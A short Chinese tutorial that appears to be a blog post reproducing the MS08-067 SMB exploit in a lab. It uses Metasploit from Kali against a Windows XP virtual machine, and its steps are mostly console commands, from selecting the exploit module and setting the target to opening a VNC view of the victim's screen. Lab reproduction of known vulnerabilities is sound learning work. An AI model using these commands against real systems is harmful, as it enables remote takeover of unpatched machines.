内容速览
1.首先需要下载kali安装到VMware中,如何安装参考我之前的文本,要想复现该经典漏洞MS08_067需要一个xp系统,防火墙关闭。这里xp系统的安装就不多做介绍了。
2.下载好kali后需要验证网络是否通畅,出现以下界面则网络通畅
代码语言:javascript复制ping www.baidu.com
若网络不通畅则检查自己的虚拟机设置
3.打开msfconsole工具
代码语言:javascript复制msfconsole
4.查找ms08_067,ms代表微软,08则代表08年发现的漏洞,067代表当年发现的第67个漏洞
代码语言:javascript复制search ms08_067
5.使用上面的Name下面的漏洞名称
代码语言:javascript复制use exploit/windows/smb/ms08_067_netapi
6.显示配置信息
其中rhost为远程主机ip,我们设置成有ms08_067漏洞的xp系统的ip,用下面的命令进行设置。
7.设置rhost
代码语言:javascript复制set rhost 192.168.201.95 注意这里的ip为xp系统的ip地址
8.显示配置信息查看是否配置成功。如图rhost后面有ip地址则配置成功。
9.我们查看target,用如下的命令
代码语言:javascript复制show targets
8.设置与自己系统相同的版本,这里我选择34,设置方式如下:
代码语言:javascript复制set target 34
9.好了到这里就配置结束了,我们开始运行:
代码语言:javascript复制exploit
出现如下我们就成功了,已经获得了最高权限,可以进行各种操作了。
10.例如我们输入如下命令,查看对方屏幕,效果如下图:
代码语言:javascript复制run vnc
